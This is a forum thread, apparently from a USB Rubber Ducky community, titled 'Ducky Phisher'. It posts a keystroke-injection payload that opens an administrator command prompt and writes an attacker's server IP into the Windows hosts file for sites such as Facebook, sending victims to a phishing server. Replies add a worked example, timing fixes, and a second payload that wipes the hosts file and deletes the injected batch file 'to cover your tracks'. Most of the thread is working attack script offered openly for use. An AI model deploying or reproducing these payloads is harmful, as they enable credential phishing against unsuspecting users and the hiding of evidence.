Jump to content

[Payload] Ducky Phisher


KoryusaiKun
 Share

Recommended Posts

Hi everyone,

This is my first post and first script for the rubber duck. I have not yet tested this script as i am still waiting to recive it here in the UK. I got it from when i was talking to my friend about something he called desktop phishing it basicly replaces say facebooks or anyother sites ip with your chosen server's ip in the host file. Anyway heres the script:

REM Author: .:Koryusai-Kun:.
REM Description: Used for phishing, it add's an ip of your choosing to the hosts file on windows
REM Description: so when the user types into there web browser for example www.facebook.com it
REM Description: insted of going to the proper ip it gose to the one in the host file your evil one.
REM Description: you need to add the www. version and with out it as well.
REM ---[Start CMD as administrator]-----------------------
GUI
DELAY 50
STRING cmd
DELAY 150
MENU
DELAY 75
STRING a
Enter
DELAY 200
LEFT
ENTER
STRING cls
ENTER
REM ---[END]----------------------------------------------
DELAY 300
REM ---[Inject into the host file]------------------------
STRING copy con inject.bat
ENTER
STRING SET NEWLINE=^& echo.
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
CONTROL z
ENTER
STRING inject.bat
ENTER
REM ---[END]----------------------------------------------
DELAY 200
STRING exit
ENTER

Link to comment
Share on other sites

You replace [WEBSITE_ADDRESS] with the website like www.facebook.com and the second with facebook.com then you put the evil server ip where [EVIL_SERVER_IP] is heres an example:

...
REM ---[END]----------------------------------------------
DELAY 300
REM ---[Inject into the host file]------------------------
STRING copy con inject.bat
ENTER
STRING SET NEWLINE=^& echo.
ENTER
ENTER
STRING FIND /C /I "www.facebook.com" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^127.0.0.1 www.facebook.com>>%WINDIR%\system32\drivers\etc\hosts
ENTER
ENTER
STRING FIND /C /I "facebook.com" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^127.0.0.1 facebook.com>>%WINDIR%\system32\drivers\etc\hosts
ENTER
CONTROL z
ENTER
STRING inject.bat
ENTER
REM ---[END]----------------------------------------------
...

Link to comment
Share on other sites

how do you reverse it if you wanna reset the default settings?(meaning you wanna direct to user to the real page )

thanks

xcopy the original file first before you edit it to host.backup. After you're done you can replace the hacked file with the original.

Link to comment
Share on other sites

  • 3 months later...

Hi everyone,

This is my first post and first script for the rubber duck. I have not yet tested this script as i am still waiting to recive it here in the UK. I got it from when i was talking to my friend about something he called desktop phishing it basicly replaces say facebooks or anyother sites ip with your chosen server's ip in the host file. Anyway heres the script:

REM Author: .:Koryusai-Kun:.
REM Description: Used for phishing, it add's an ip of your choosing to the hosts file on windows
REM Description: so when the user types into there web browser for example www.facebook.com it
REM Description: insted of going to the proper ip it gose to the one in the host file your evil one.
REM Description: you need to add the www. version and with out it as well.
REM ---[Start CMD as administrator]-----------------------
GUI
DELAY 50
STRING cmd
DELAY 150
MENU
DELAY 75
STRING a
Enter
DELAY 200
LEFT
ENTER
STRING cls
ENTER
REM ---[END]----------------------------------------------
DELAY 300
REM ---[Inject into the host file]------------------------
STRING copy con inject.bat
ENTER
STRING SET NEWLINE=^& echo.
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
CONTROL z
ENTER
STRING inject.bat
ENTER
REM ---[END]----------------------------------------------
DELAY 200
STRING exit
ENTER

I've not been able to get this to successfully execute. Can anyone confirm it's successful operation? I tweaked the delays and it works like a charm. My next project related to this is a quick edit to this that will include the commands necessary (replying "yes") to overwrite the existing hosts file.

For those not familiar, if you successfully execute this command and try to run it again, you are prompted with a command line prompt asking for permission to overwrite the existing file. As soon as I have it tested and working, I'll post it. I went a simpler route, see the following post.

Edited by skimpniff
Link to comment
Share on other sites

  • 2 weeks later...

Hi everyone,

This is my first post and first script for the rubber duck. I have not yet tested this script as i am still waiting to recive it here in the UK. I got it from when i was talking to my friend about something he called desktop phishing it basicly replaces say facebooks or anyother sites ip with your chosen server's ip in the host file. Anyway heres the script:

REM Author: .:Koryusai-Kun:.
REM Description: Used for phishing, it add's an ip of your choosing to the hosts file on windows
REM Description: so when the user types into there web browser for example www.facebook.com it
REM Description: insted of going to the proper ip it gose to the one in the host file your evil one.
REM Description: you need to add the www. version and with out it as well.
REM ---[Start CMD as administrator]-----------------------
GUI
DELAY 50
STRING cmd
DELAY 150
MENU
DELAY 75
STRING a
Enter
DELAY 200
LEFT
ENTER
STRING cls
ENTER
REM ---[END]----------------------------------------------
DELAY 300
REM ---[Inject into the host file]------------------------
STRING copy con inject.bat
ENTER
STRING SET NEWLINE=^& echo.
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
CONTROL z
ENTER
STRING inject.bat
ENTER
REM ---[END]----------------------------------------------
DELAY 200
STRING exit
ENTER

Here is a cleanup script. Very simple for if you want to reset the hosts file to empty to cover your tracks.

REM Author: skimpniff

REM Description: Clean up by resetting the hosts file back to empty and deleting the inject.bat file

ESCAPE

CONTROL ESCAPE

DELAY 600

STRING cmd

DELAY 1000

MENU

DELAY 1000

STRING a

DELAY 1000

LEFT

DELAY 1000

ENTER

DELAY 400

STRING cd drivers\etc\

DELAY 400

ENTER

DELAY 400

STRING copy con hosts

DELAY 400

ENTER

ENTER

DELAY 400

STRING All

ENTER

ENTER

DELAY 400

CONTROL z

DELAY 400

ENTER

DELAY 400

STRING exit

ENTER

Here is a modification to add to bottom of the original that deletes the inject.bat file

CONTROL z

ENTER

DELAY 400

STRING inject.bat

ENTER

DELAY 400

STRING del c:\windows\system32\inject.bat

ENTER

DELAY 400

STRING exit

ENTER

Edited by skimpniff
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...